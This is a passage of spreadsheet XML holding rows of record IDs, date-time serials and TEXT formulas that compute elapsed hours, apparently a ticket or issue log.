        <f>TEXT(F1093-E1093,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="1094" spans="1:8" hidden="1">
      <c r="A1094" t="s">
        <v>3172</v>
      </c>
      <c r="B1094">
        <v>12362</v>
      </c>
      <c r="C1094" t="s">
        <v>3173</v>
      </c>
      <c r="D1094" t="s">
        <v>7</v>
      </c>
      <c r="E1094" s="1">
        <v>43414.887349537035</v>
      </c>
      <c r="F1094" s="1">
        <v>43416.97042824074</v>
      </c>
      <c r="G1094" t="s">
        <v>3174</v>
      </c>
      <c r="H1094" t="str">
        <f>TEXT(F1094-E1094,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="1095" spans="1:8" hidden="1">
      <c r="A1095" t="s">
        <v>1772</v>
      </c>
      <c r="B1095">
        <v>12361</v>
      </c>
      <c r="C1095" t="s">
        <v>3175</v>
      </c>
      <c r="D1095" t="s">
        <v>7</v>
      </c>
      <c r="E1095" s="1">
        <v>43414.748761574076</v>
      </c>
      <c r="F1095" s="1">
        <v>43424.919861111113</v>
      </c>
      <c r="G1095" t="s">
        <v>3176</v>
      </c>
      <c r="H1095" t="str">
        <f>TEXT(F1095-E1095,"[h]")</f>
        <v>244</v>
      </c>
    </row>
    <row r="1096" spans="1:8" hidden="1">
      <c r="A1096" t="s">
        <v>3177</v>
      </c>
      <c r="B1096">
        <v>12360</v>
      </c>
      <c r="C1096" t="s">
        <v>3178</v>
      </c>
      <c r="D1096" t="s">
        <v>7</v>
      </c>
      <c r="E1096" s="1">
        <v>43414.718506944446</v>
      </c>
      <c r="F1096" s="1">
        <v>43426.633958333332</v>
      </c>
      <c r="G1096" t="s">
        <v>552</v>
      </c>
      <c r="H1096" t="str">
        <f>TEXT(F1096-E1096,"[h]")</f>
        <v>285</v>
      </c>
    </row>
    <row r="1097" spans="1:8">
      <c r="A1097" t="s">
        <v>3179</v>
      </c>
      <c r="B1097">
        <v>12358</v>
      </c>
      <c r="C1097" t="s">
        <v>3180</v>
      </c>
      <c r="D1097" t="s">
        <v>7</v>
      </c>
      <c r="E1097" s="1">
        <v>43413.978356481479</v>
      </c>
      <c r="F1097" s="1">
        <v>43418.998310185183</v>
      </c>
      <c r="G1097" t="s">
        <v>31</v>
      </c>
      <c r="H1097" t="str">
        <f>TEXT(F1097-E1097,"[h]")</f>
        <v>120</v>
      </c>
    </row>
    <row r="1098" spans="1:8" hidden="1">
      <c r="A1098" t="s">
        <v>3181</v>
      </c>
      <c r="B1098">
        <v>12357</v>
      </c>
      <c r="C1098" t="s">
        <v>3182</v>
      </c>
      <c r="D1098" t="s">
        <v>7</v>
      </c>
      <c r="E1098" s="1">
        <v>43413.878692129627</v>
      </c>
      <c r="F1098" s="1">
        <v>43413.996979166666</v>
      </c>
      <c r="G1098" t="s">
        <v>592</v>
      </c>
      <c r="H1098" t="str">
        <f>TEXT(F1098-E1098,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1099" spans="1:8">
      <c r="A1099" t="s">
        <v>3183</v>
      </c>
      <c r="B1099">
        <v>12354</v>
      </c>
      <c r="C1099" t="s">
        <v>3184</v>
      </c>
      <c r="D1099" t="s">
        <v>7</v>
      </c>
      <c r="E1099" s="1">
        <v>43412.858715277776</v>
      </c>
      <c r="F1099" s="1">
        <v>43414.961226851854</v>
      </c>
      <c r="G1099" t="s">
        <v>16</v>
      </c>
      <c r="H1099" t="str">
        <f>TEXT(F1099-E1099,"[h]")</f>
        <v>50</v>
      </c>
    </row>
    <row r="1100" spans="1:8">
      <c r="A1100" t="s">
        <v>3185</v>
      </c>
      <c r="B1100">
        <v>12353</v>
      </c>
      <c r="C1100" t="s">
        <v>3186</v>
      </c>
      <c r="D1100" t="s">
        <v>7</v>
      </c>
      <c r="E1100" s="1">
        <v>43412.79619212963</v>
      </c>
      <c r="F1100" s="1">
        <v>43438.616979166669</v>
      </c>
      <c r="G1100" t="s">
        <v>16</v>
      </c>
      <c r="H1100" t="str">
        <f>TEXT(F1100-E1100,"[h]")</f>
        <v>619</v>
      </c>
    </row>
    <row r="1101" spans="1:8" hidden="1">
      <c r="A1101" t="s">
        <v>3187</v>
      </c>
      <c r="B1101">
        <v>12349</v>
      </c>
      <c r="C1101" t="s">
        <v>3188</v>
      </c>
      <c r="D1101" t="s">
        <v>7</v>
      </c>
      <c r="E1101" s="1">
        <v>43411.805717592593</v>
      </c>
      <c r="F1101" s="1">
        <v>43414.039201388892</v>
      </c>
      <c r="G1101" t="s">
        <v>852</v>
      </c>
      <c r="H1101" t="str">
        <f>TEXT(F1101-E1101,"[h]")</f>
        <v>53</v>
      </c>
    </row>
    <row r="1102" spans="1:8">
      <c r="A1102" t="s">
        <v>3189</v>
      </c>
      <c r="B1102">
        <v>12342</v>
      </c>
      <c r="C1102" t="s">
        <v>3190</v>
      </c>
      <c r="D1102" t="s">
        <v>7</v>
      </c>
      <c r="E1102" s="1">
        <v>43410.476550925923</v>
      </c>
      <c r="F1102" s="1">
        <v>43417.603090277778</v>
      </c>
      <c r="G1102" t="s">
        <v>16</v>
      </c>
      <c r="H1102" t="str">
        <f>TEXT(F1102-E1102,"[h]")</f>
        <v>171</v>
      </c>
    </row>
    <row r="1103" spans="1:8" hidden="1">
      <c r="A1103" t="s">
        <v>3191</v>
      </c>
      <c r="B1103">
        <v>12338</v>
      </c>
      <c r="C1103" t="s">
        <v>3192</v>
      </c>
      <c r="D1103" t="s">
        <v>7</v>
      </c>
      <c r="E1103" s="1">
        <v>43409.8358912037</v>
      </c>
      <c r="F1103" s="1">
        <v>43417.789918981478</v>
      </c>
      <c r="G1103" t="s">
        <v>66</v>
      </c>
      <c r="H1103" t="str">
        <f>TEXT(F1103-E1103,"[h]")</f>
        <v>190</v>
      </c>
    </row>
    <row r="1104" spans="1:8" hidden="1">
      <c r="A1104" t="s">
        <v>3193</v>
      </c>
      <c r="B1104">
        <v>12337</v>
      </c>
      <c r="C1104" t="s">
        <v>3194</v>
      </c>
      <c r="D1104" t="s">
        <v>7</v>
      </c>
      <c r="E1104" s="1">
        <v>43409.738738425927</v>
      </c>
      <c r="F1104" s="1">
        <v>43412.727326388886</v>
      </c>
      <c r="G1104" t="s">
        <v>547</v>
      </c>
      <c r="H1104" t="str">
        <f>TEXT(F1104-E1104,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="1105" spans="1:8" hidden="1">
      <c r="A1105" t="s">
        <v>3195</v>
      </c>
      <c r="B1105">
        <v>12335</v>
      </c>
      <c r="C1105" t="s">
        <v>3196</v>
      </c>
      <c r="D1105" t="s">
        <v>7</v>
      </c>
      <c r="E1105" s="1">
        <v>43409.573067129626</v>
      </c>
      <c r="F1105" s="1">
        <v>43651.978750000002</v>
      </c>
      <c r="G1105" t="s">
        <v>207</v>
      </c>
      <c r="H1105" t="str">
        <f>TEXT(F1105-E1105,"[h]")</f>
        <v>5817</v>
      </c>
    </row>
    <row r="1106" spans="1:8" hidden="1">
      <c r="A1106" t="s">
        <v>3197</v>
      </c>
      <c r="B1106">
        <v>12333</v>
      </c>
      <c r="C1106" t="s">
        <v>3198</v>
      </c>
      <c r="D1106" t="s">
        <v>7</v>
      </c>
      <c r="E1106" s="1">
        <v>43409.464004629626</v>
      </c>
      <c r="F1106" s="1">
        <v>43458.27888888889</v>
      </c>
      <c r="G1106" t="s">
        <v>204</v>
      </c>
      <c r="H1106" t="str">
        <f>TEXT(F1106-E1106,"[h]")</f>
        <v>1171</v>
      </c>
    </row>
    <row r="1107" spans="1:8" hidden="1">
      <c r="A1107" t="s">
        <v>3199</v>
      </c>
      <c r="B1107">
        <v>12331</v>
      </c>
      <c r="C1107" t="s">
        <v>3200</v>
      </c>
      <c r="D1107" t="s">
        <v>7</v>
      </c>
      <c r="E1107" s="1">
        <v>43409.102719907409</v>
      </c>
      <c r="F1107" s="1">
        <v>43413.994618055556</v>
      </c>
      <c r="G1107" t="s">
        <v>2423</v>
      </c>
      <c r="H1107" t="str">
        <f>TEXT(F1107-E1107,"[h]")</f>
        <v>117</v>
      </c>
    </row>
    <row r="1108" spans="1:8" hidden="1">
      <c r="A1108" t="s">
        <v>3201</v>
      </c>
      <c r="B1108">
        <v>12330</v>
      </c>
      <c r="C1108" t="s">
        <v>3202</v>
      </c>
      <c r="D1108" t="s">
        <v>7</v>
      </c>
      <c r="E1108" s="1">
        <v>43409.024988425925</v>
      </c>
      <c r="F1108" s="1">
        <v>43411.079050925924</v>
      </c>
      <c r="G1108" t="s">
        <v>55</v>
      </c>
      <c r="H1108" t="str">
        <f>TEXT(F1108-E1108,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="1109" spans="1:8" hidden="1">
      <c r="A1109" t="s">
        <v>3203</v>
      </c>
      <c r="B1109">
        <v>12328</v>
      </c>
      <c r="C1109" t="s">
        <v>3204</v>
      </c>
      <c r="D1109" t="s">
        <v>7</v>
      </c>
      <c r="E1109" s="1">
        <v>43408.812245370369</v>
      </c>
      <c r="F1109" s="1">
        <v>43437.079675925925</v>
      </c>
      <c r="G1109" t="s">
        <v>3174</v>
      </c>
      <c r="H1109" t="str">
        <f>TEXT(F1109-E1109,"[h]")</f>
        <v>678</v>
      </c>
    </row>
    <row r="1110" spans="1:8" hidden="1">
      <c r="A1110" t="s">
        <v>3205</v>
      </c>
      <c r="B1110">
        <v>12327</v>
      </c>
      <c r="C1110" t="s">
        <v>3206</v>
      </c>
      <c r="D1110" t="s">
        <v>7</v>
      </c>
      <c r="E1110" s="1">
        <v>43408.762557870374</v>
      </c>
      <c r="F1110" s="1">
        <v>43414.995104166665</v>
      </c>
      <c r="G1110" t="s">
        <v>3174</v>
      </c>
      <c r="H1110" t="str">
        <f>TEXT(F1110-E1110,"[h]")</f>
        <v>149</v>
      </c>
    </row>
    <row r="1111" spans="1:8" hidden="1">
      <c r="A1111" t="s">
        <v>2666</v>
      </c>
      <c r="B1111">
        <v>12326</v>
      </c>
      <c r="C1111" t="s">
        <v>3207</v>
      </c>
      <c r="D1111" t="s">
        <v>7</v>
      </c>
      <c r="E1111" s="1">
        <v>43408.745173611111</v>
      </c>
      <c r="F1111" s="1">
        <v>43408.823692129627</v>
      </c>
      <c r="G1111" t="s">
        <v>1103</v>
      </c>
      <c r="H1111" t="str">
        <f>TEXT(F1111-E1111,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1112" spans="1:8" hidden="1">
      <c r="A1112" t="s">
        <v>3208</v>
      </c>
      <c r="B1112">
        <v>12321</v>
      </c>
      <c r="C1112" t="s">
        <v>3209</v>
      </c>
      <c r="D1112" t="s">
        <v>7</v>
      </c>
      <c r="E1112" s="1">
        <v>43407.905358796299</v>
      </c>
      <c r="F1112" s="1">
        <v>43408.091423611113</v>
      </c>
      <c r="G1112" t="s">
        <v>3174</v>
      </c>
      <c r="H1112" t="str">
        <f>TEXT(F1112-E1112,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1113" spans="1:8" hidden="1">
      <c r="A1113" t="s">
        <v>3210</v>
      </c>
      <c r="B1113">
        <v>12320</v>
      </c>
      <c r="C1113" t="s">
        <v>3211</v>
      </c>
      <c r="D1113" t="s">
        <v>7</v>
      </c>
      <c r="E1113" s="1">
        <v>43407.712129629632</v>
      </c>
      <c r="F1113" s="1">
        <v>43407.93613425926</v>
      </c>
      <c r="G1113" t="s">
        <v>1103</v>
      </c>
      <c r="H1113" t="str">
        <f>TEXT(F1113-E1113,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1114" spans="1:8" hidden="1">
      <c r="A1114" t="s">
        <v>3212</v>
      </c>
      <c r="B1114">
        <v>12317</v>
      </c>
      <c r="C1114" t="s">
        <v>2672</v>
      </c>
      <c r="D1114" t="s">
        <v>7</v>
      </c>
      <c r="E1114" s="1">
        <v>43407.197858796295</v>
      </c>
      <c r="F1114" s="1">
        <v>43454.599664351852</v>
      </c>
      <c r="G1114" t="s">
        <v>3213</v>
      </c>
      <c r="H1114" t="str">
        <f>TEXT(F1114-E1114,"[h]")</f>
        <v>1137</v>
      </c>
    </row>
    <row r="1115" spans="1:8" hidden="1">
      <c r="A1115" t="s">
        <v>3214</v>
      </c>
      <c r="B1115">
        <v>12312</v>
      </c>
      <c r="C1115" t="s">
        <v>3215</v>
      </c>
      <c r="D1115" t="s">
        <v>7</v>
      </c>
      <c r="E1115" s="1">
        <v>43406.708055555559</v>
      </c>
      <c r="F1115" s="1">
        <v>43416.008634259262</v>
      </c>
      <c r="G1115" t="s">
        <v>2909</v>
      </c>
      <c r="H1115" t="str">
        <f>TEXT(F1115-E1115,"[h]")</f>
        <v>223</v>
      </c>
    </row>
    <row r="1116" spans="1:8" hidden="1">
      <c r="A1116" t="s">
        <v>3216</v>
      </c>
      <c r="B1116">
        <v>12308</v>
      </c>
      <c r="C1116" t="s">
        <v>2675</v>
      </c>
      <c r="D1116" t="s">
        <v>7</v>
      </c>
      <c r="E1116" s="1">
        <v>43406.249664351853</v>
      </c>
      <c r="F1116" s="1">
        <v>43466.867129629631</v>
      </c>
      <c r="G1116" t="s">
        <v>3217</v>
      </c>
      <c r="H1116" t="str">
        <f>TEXT(F1116-E1116,"[h]")</f>
        <v>1454</v>
      </c>
    </row>
    <row r="1117" spans="1:8" hidden="1">
      <c r="A1117" t="s">
        <v>3218</v>
      </c>
      <c r="B1117">
        <v>12307</v>
      </c>
      <c r="C1117" t="s">
        <v>3219</v>
      </c>
      <c r="D1117" t="s">
        <v>7</v>
      </c>
      <c r="E1117" s="1">
        <v>43406.137962962966</v>
      </c>
      <c r="F1117" s="1">
        <v>43406.441064814811</v>
      </c>
      <c r="G1117" t="s">
        <v>3220</v>
      </c>
      <c r="H1117" t="str">
        <f>TEXT(F1117-E1117,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1118" spans="1:8" hidden="1">
      <c r="A1118" t="s">
        <v>3221</v>
      </c>
      <c r="B1118">
        <v>12306</v>
      </c>
      <c r="C1118" t="s">
        <v>3222</v>
      </c>
      <c r="D1118" t="s">
        <v>7</v>
      </c>
      <c r="E1118" s="1">
        <v>43405.975370370368</v>
      </c>
      <c r="F1118" s="1">
        <v>43424.124918981484</v>
      </c>
      <c r="G1118" t="s">
        <v>55</v>
      </c>
      <c r="H1118" t="str">
        <f>TEXT(F1118-E1118,"[h]")</f>
        <v>435</v>
      </c>
    </row>
    <row r="1119" spans="1:8" hidden="1">
      <c r="A1119" t="s">
        <v>3223</v>
      </c>
      <c r="B1119">
        <v>12304</v>
      </c>
      <c r="C1119" t="s">
        <v>3224</v>
      </c>
      <c r="D1119" t="s">
        <v>7</v>
      </c>
      <c r="E1119" s="1">
        <v>43405.308634259258</v>
      </c>
      <c r="F1119" s="1">
        <v>43405.653240740743</v>
      </c>
      <c r="G1119" t="s">
        <v>304</v>
      </c>
      <c r="H1119" t="str">
        <f>TEXT(F1119-E1119,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1120" spans="1:8">
      <c r="A1120" t="s">
        <v>3227</v>
      </c>
      <c r="B1120">
        <v>12300</v>
      </c>
      <c r="C1120" t="s">
        <v>3228</v>
      </c>
      <c r="D1120" t="s">
        <v>7</v>
      </c>
      <c r="E1120" s="1">
        <v>43404.419918981483</v>
      </c>
      <c r="F1120" s="1">
        <v>43414.961226851854</v>
      </c>
      <c r="G1120" t="s">
        <v>16</v>
      </c>
      <c r="H1120" t="str">
        <f>TEXT(F1120-E1120,"[h]")</f>
        <v>252</v>
      </c>
    </row>
    <row r="1121" spans="1:8" hidden="1">
      <c r="A1121" t="s">
        <v>3229</v>
      </c>
      <c r="B1121">
        <v>12299</v>
      </c>
      <c r="C1121" t="s">
        <v>3230</v>
      </c>
      <c r="D1121" t="s">
        <v>7</v>
      </c>
      <c r="E1121" s="1">
        <v>43404.411712962959</v>
      </c>
      <c r="F1121" s="1">
        <v>43405.701932870368</v>
      </c>
      <c r="G1121" t="s">
        <v>55</v>
      </c>
      <c r="H1121" t="str">
        <f>TEXT(F1121-E1121,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1122" spans="1:8" hidden="1">
      <c r="A1122" t="s">
        <v>3231</v>
      </c>
      <c r="B1122">
        <v>12298</v>
      </c>
      <c r="C1122" t="s">
        <v>3232</v>
      </c>
      <c r="D1122" t="s">
        <v>7</v>
      </c>
      <c r="E1122" s="1">
        <v>43404.163981481484</v>
      </c>
      <c r="F1122" s="1">
        <v>43443.694166666668</v>
      </c>
      <c r="G1122" t="s">
        <v>55</v>
      </c>
      <c r="H1122" t="str">
        <f>TEXT(F1122-E1122,"[h]")</f>
        <v>948</v>
      </c>
    </row>
    <row r="1123" spans="1:8">
      <c r="A1123" t="s">
        <v>3235</v>
      </c>
      <c r="B1123">
        <v>12296</v>
      </c>
      <c r="C1123" t="s">
        <v>3236</v>
      </c>
      <c r="D1123" t="s">
        <v>7</v>
      </c>
      <c r="E1123" s="1">
        <v>43404.120358796295</v>
      </c>
      <c r="F1123" s="1">
        <v>43404.617291666669</v>
      </c>
      <c r="G1123" t="s">
        <v>98</v>
      </c>
      <c r="H1123" t="str">
        <f>TEXT(F1123-E1123,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1124" spans="1:8" hidden="1">
      <c r="A1124" t="s">
        <v>3237</v>
      </c>
      <c r="B1124">
        <v>12295</v>
      </c>
      <c r="C1124" t="s">
        <v>3238</v>
      </c>
      <c r="D1124" t="s">
        <v>7</v>
      </c>
      <c r="E1124" s="1">
        <v>43403.940127314818</v>
      </c>
      <c r="F1124" s="1">
        <v>43538.766944444447</v>
      </c>
      <c r="G1124" t="s">
        <v>3239</v>
      </c>
      <c r="H1124" t="str">
        <f>TEXT(F1124-E1124,"[h]")</f>
        <v>3235</v>
      </c>
    </row>
    <row r="1125" spans="1:8" hidden="1">
      <c r="A1125" t="s">
        <v>3240</v>
      </c>
      <c r="B1125">
        <v>12292</v>
      </c>
      <c r="C1125" t="s">
        <v>3241</v>
      </c>
      <c r="D1125" t="s">
        <v>7</v>
      </c>
      <c r="E1125" s="1">
        <v>43402.908055555556</v>
      </c>
      <c r="F1125" s="1">
        <v>43403.049432870372</v>
      </c>
      <c r="G1125" t="s">
        <v>474</v>
      </c>
      <c r="H1125" t="str">
        <f>TEXT(F1125-E1125,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1126" spans="1:8" hidden="1">
      <c r="A1126" t="s">
        <v>3242</v>
      </c>
      <c r="B1126">
        <v>12291</v>
      </c>
      <c r="C1126" t="s">
        <v>3243</v>
      </c>
      <c r="D1126" t="s">
        <v>7</v>
      </c>
      <c r="E1126" s="1">
        <v>43402.893113425926</v>
      </c>
      <c r="F1126" s="1">
        <v>43403.058703703704</v>
      </c>
      <c r="G1126" t="s">
        <v>28</v>
      </c>
      <c r="H1126" t="str">
        <f>TEXT(F1126-E1126,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1127" spans="1:8" hidden="1">
      <c r="A1127" t="s">
        <v>3244</v>
      </c>
      <c r="B1127">
        <v>12288</v>
      </c>
      <c r="C1127" t="s">
        <v>3245</v>
      </c>
      <c r="D1127" t="s">
        <v>7</v>
      </c>
      <c r="E1127" s="1">
        <v>43402.803032407406</v>
      </c>
      <c r="F1127" s="1">
        <v>43402.834733796299</v>
      </c>
      <c r="G1127" t="s">
        <v>95</v>
      </c>
      <c r="H1127" t="str">
        <f>TEXT(F1127-E1127,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1128" spans="1:8" hidden="1">
      <c r="A1128" t="s">
        <v>3246</v>
      </c>
      <c r="B1128">
        <v>12286</v>
      </c>
      <c r="C1128" t="s">
        <v>3247</v>
      </c>
      <c r="D1128" t="s">
        <v>7</v>
      </c>
      <c r="E1128" s="1">
        <v>43402.785162037035</v>
      </c>
      <c r="F1128" s="1">
        <v>43424.053877314815</v>
      </c>
      <c r="G1128" t="s">
        <v>28</v>
      </c>
      <c r="H1128" t="str">
        <f>TEXT(F1128-E1128,"[h]")</f>
        <v>510</v>
      </c>
    </row>
    <row r="1129" spans="1:8" hidden="1">
      <c r="A1129" t="s">
        <v>3248</v>
      </c>
      <c r="B1129">
        <v>12285</v>
      </c>
      <c r="C1129" t="s">
        <v>3249</v>
      </c>
      <c r="D1129" t="s">
        <v>7</v>
      </c>
      <c r="E1129" s="1">
        <v>43402.591539351852</v>
      </c>
      <c r="F1129" s="1">
        <v>43402.716828703706</v>
      </c>
      <c r="G1129" t="s">
        <v>547</v>
      </c>
      <c r="H1129" t="str">
        <f>TEXT(F1129-E1129,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1130" spans="1:8" hidden="1">
      <c r="A1130" t="s">
        <v>3250</v>
      </c>
      <c r="B1130">
        <v>12284</v>
      </c>
      <c r="C1130" t="s">
        <v>3251</v>
      </c>
      <c r="D1130" t="s">
        <v>7</v>
      </c>
      <c r="E1130" s="1">
        <v>43402.491597222222</v>
      </c>
      <c r="F1130" s="1">
        <v>43712.633113425924</v>
      </c>
      <c r="G1130" t="s">
        <v>3252</v>
      </c>
      <c r="H1130" t="str">
        <f>TEXT(F1130-E1130,"[h]")</f>
        <v>7443</v>
      </c>
    </row>
    <row r="1131" spans="1:8" hidden="1">
      <c r="A1131" t="s">
        <v>3253</v>
      </c>
      <c r="B1131">
        <v>12280</v>
      </c>
      <c r="C1131" t="s">
        <v>3254</v>
      </c>
      <c r="D1131" t="s">
        <v>7</v>
      </c>
      <c r="E1131" s="1">
        <v>43400.824178240742</v>
      </c>
      <c r="F1131" s="1">
        <v>43402.837453703702</v>
      </c>
      <c r="G1131" t="s">
        <v>3255</v>
      </c>
      <c r="H1131" t="str">
        <f>TEXT(F1131-E1131,"[h]")</f>
        <v>48</v>
      </c>
    </row>
    <row r="1132" spans="1:8" hidden="1">
      <c r="A1132" t="s">
        <v>3256</v>
      </c>
      <c r="B1132">
        <v>12279</v>
      </c>
      <c r="C1132" t="s">
        <v>3257</v>
      </c>
      <c r="D1132" t="s">
        <v>7</v>
      </c>
      <c r="E1132" s="1">
        <v>43400.823263888888</v>
      </c>
      <c r="F1132" s="1">
        <v>43404.544988425929</v>
      </c>
      <c r="G1132" t="s">
        <v>998</v>
      </c>
      <c r="H1132" t="str">
        <f>TEXT(F1132-E1132,"[h]")</f>
        <v>89</v>
      </c>
    </row>
    <row r="1133" spans="1:8" hidden="1">
      <c r="A1133" t="s">
        <v>3225</v>
      </c>
      <c r="B1133">
        <v>12277</v>
      </c>
      <c r="C1133" t="s">
        <v>3226</v>
      </c>
      <c r="D1133" t="s">
        <v>7</v>
      </c>
      <c r="E1133" s="1">
        <v>43400.039039351854</v>
      </c>
      <c r="F1133" s="1">
        <v>43404.907025462962</v>
      </c>
      <c r="G1133" t="s">
        <v>255</v>
      </c>
      <c r="H1133" t="str">
        <f>TEXT(F1133-E1133,"[h]")</f>
        <v>116</v>
      </c>
    </row>
    <row r="1134" spans="1:8" hidden="1">
      <c r="A1134" t="s">
        <v>3258</v>
      </c>
      <c r="B1134">
        <v>12276</v>
      </c>
      <c r="C1134" t="s">
        <v>3259</v>
      </c>
      <c r="D1134" t="s">
        <v>7</v>
      </c>
      <c r="E1134" s="1">
        <v>43399.971388888887</v>
      </c>
      <c r="F1134" s="1">
        <v>43400.360381944447</v>
      </c>
      <c r="G1134" t="s">
        <v>28</v>
      </c>
      <c r="H1134" t="str">
        <f>TEXT(F1134-E1134,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1135" spans="1:8" hidden="1">
      <c r="A1135" t="s">
        <v>3125</v>
      </c>
      <c r="B1135">
        <v>12273</v>
      </c>
      <c r="C1135" t="s">
        <v>3126</v>
      </c>
      <c r="D1135" t="s">
        <v>7</v>
      </c>
      <c r="E1135" s="1">
        <v>43399.661099537036</v>
      </c>
      <c r="F1135" s="1">
        <v>43423.049456018518</v>
      </c>
      <c r="G1135" t="s">
        <v>336</v>
      </c>
      <c r="H1135" t="str">
        <f>TEXT(F1135-E1135,"[h]")</f>
        <v>561</v>
      </c>
    </row>
    <row r="1136" spans="1:8" hidden="1">
      <c r="A1136" t="s">
        <v>3260</v>
      </c>
      <c r="B1136">
        <v>12272</v>
      </c>
      <c r="C1136" t="s">
        <v>3261</v>
      </c>
      <c r="D1136" t="s">
        <v>7</v>
      </c>
      <c r="E1136" s="1">
        <v>43399.659953703704</v>
      </c>
      <c r="F1136" s="1">
        <v>43419.577106481483</v>
      </c>
      <c r="G1136" t="s">
        <v>66</v>
      </c>
      <c r="H1136" t="str">
        <f>TEXT(F1136-E1136,"[h]")</f>
        <v>478</v>
      </c>
    </row>
    <row r="1137" spans="1:8" hidden="1">
      <c r="A1137" t="s">
        <v>3262</v>
      </c>
      <c r="B1137">
        <v>12268</v>
      </c>
      <c r="C1137" t="s">
        <v>3263</v>
      </c>
      <c r="D1137" t="s">
        <v>7</v>
      </c>
      <c r="E1137" s="1">
        <v>43399.587650462963</v>
      </c>
      <c r="F1137" s="1">
        <v>43405.022164351853</v>
      </c>
      <c r="G1137" t="s">
        <v>66</v>
      </c>
      <c r="H1137" t="str">
        <f>TEXT(F1137-E1137,"[h]")</f>
        <v>130</v>
      </c>
    </row>
    <row r="1138" spans="1:8" hidden="1">
      <c r="A1138" t="s">
        <v>3264</v>
      </c>
      <c r="B1138">
        <v>12267</v>
      </c>
      <c r="C1138" t="s">
        <v>3265</v>
      </c>
      <c r="D1138" t="s">
        <v>7</v>
      </c>
      <c r="E1138" s="1">
        <v>43399.510891203703</v>
      </c>
      <c r="F1138" s="1">
        <v>43480.234155092592</v>
      </c>
      <c r="G1138" t="s">
        <v>2948</v>
      </c>
      <c r="H1138" t="str">
        <f>TEXT(F1138-E1138,"[h]")</f>
        <v>1937</v>
      </c>
    </row>
    <row r="1139" spans="1:8">
      <c r="A1139" t="s">
        <v>3266</v>
      </c>
      <c r="B1139">
        <v>12266</v>
      </c>
      <c r="C1139" t="s">
        <v>3267</v>
      </c>
      <c r="D1139" t="s">
        <v>7</v>
      </c>
      <c r="E1139" s="1">
        <v>43399.242418981485</v>
      </c>
      <c r="F1139" s="1">
        <v>43405.959756944445</v>
      </c>
      <c r="G1139" t="s">
        <v>16</v>
      </c>
      <c r="H1139" t="str">
        <f>TEXT(F1139-E1139,"[h]")</f>
        <v>161</v>
      </c>
    </row>
    <row r="1140" spans="1:8" hidden="1">
      <c r="A1140" t="s">
        <v>3268</v>
      </c>
      <c r="B1140">
        <v>12263</v>
      </c>
      <c r="C1140" t="s">
        <v>3269</v>
      </c>
      <c r="D1140" t="s">
        <v>7</v>
      </c>
      <c r="E1140" s="1">
        <v>43399.035474537035</v>
      </c>
      <c r="F1140" s="1">
        <v>43402.837453703702</v>
      </c>
      <c r="G1140" t="s">
        <v>3270</v>
      </c>
      <c r="H1140" t="str">
        <f>TEXT(F1140-E1140,"[h]")</f>
        <v>91</v>
      </c>
    </row>
    <row r="1141" spans="1:8">
      <c r="A1141" t="s">
        <v>3271</v>
      </c>
      <c r="B1141">
        <v>12262</v>
      </c>
      <c r="C1141" t="s">
        <v>3272</v>
      </c>
      <c r="D1141" t="s">
        <v>7</v>
      </c>
      <c r="E1141" s="1">
        <v>43398.98128472222</v>
      </c>
      <c r="F1141" s="1">
        <v>43399.281435185185</v>
      </c>
      <c r="G1141" t="s">
        <v>25</v>
      </c>
      <c r="H1141" t="str">
        <f>TEXT(F1141-E1141,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1142" spans="1:8" hidden="1">
      <c r="A1142" t="s">
        <v>3273</v>
      </c>
      <c r="B1142">
        <v>12261</v>
      </c>
      <c r="C1142" t="s">
        <v>3274</v>
      </c>
      <c r="D1142" t="s">
        <v>7</v>
      </c>
      <c r="E1142" s="1">
        <v>43398.742175925923</v>
      </c>
      <c r="F1142" s="1">
        <v>43611.590624999997</v>
      </c>
      <c r="G1142" t="s">
        <v>66</v>
      </c>
      <c r="H1142" t="str">
        <f>TEXT(F1142-E1142,"[h]")</f>
        <v>5108</v>
      </c>
    </row>
    <row r="1143" spans="1:8" hidden="1">
      <c r="A1143" t="s">
        <v>3275</v>
      </c>
      <c r="B1143">
        <v>12259</v>
      </c>
      <c r="C1143" t="s">
        <v>3276</v>
      </c>
      <c r="D1143" t="s">
        <v>7</v>
      </c>
      <c r="E1143" s="1">
        <v>43397.850543981483</v>
      </c>
      <c r="F1143" s="1">
        <v>43410.875104166669</v>
      </c>
      <c r="G1143" t="s">
        <v>55</v>
      </c>
      <c r="H1143" t="str">
        <f>TEXT(F1143-E1143,"[h]")</f>
        <v>312</v>
      </c>
    </row>
    <row r="1144" spans="1:8">
      <c r="A1144" t="s">
        <v>3233</v>
      </c>
      <c r="B1144">
        <v>12257</v>
      </c>
      <c r="C1144" t="s">
        <v>3234</v>
      </c>
      <c r="D1144" t="s">
        <v>7</v>
      </c>
      <c r="E1144" s="1">
        <v>43397.659444444442</v>
      </c>
      <c r="F1144" s="1">
        <v>43399.607916666668</v>
      </c>
      <c r="G1144" t="s">
        <v>1420</v>
      </c>
      <c r="H1144" t="str">
        <f>TEXT(F1144-E1144,"[h]")</f>
        <v>46</v>
      </c>
    </row>
    <row r="1145" spans="1:8" hidden="1">
      <c r="A1145" t="s">
        <v>3277</v>
      </c>
      <c r="B1145">
        <v>12255</v>
      </c>
      <c r="C1145" t="s">
        <v>3278</v>
      </c>
      <c r="D1145" t="s">
        <v>7</v>
      </c>
      <c r="E1145" s="1">
        <v>43397.432523148149</v>
      </c>
      <c r="F1145" s="1">
        <v>43398.327650462961</v>
      </c>
      <c r="G1145" t="s">
        <v>3279</v>
      </c>
      <c r="H1145" t="str">
        <f>TEXT(F1145-E1145,"[h]")</f>
        <v>21</v>
      </c>
    </row>
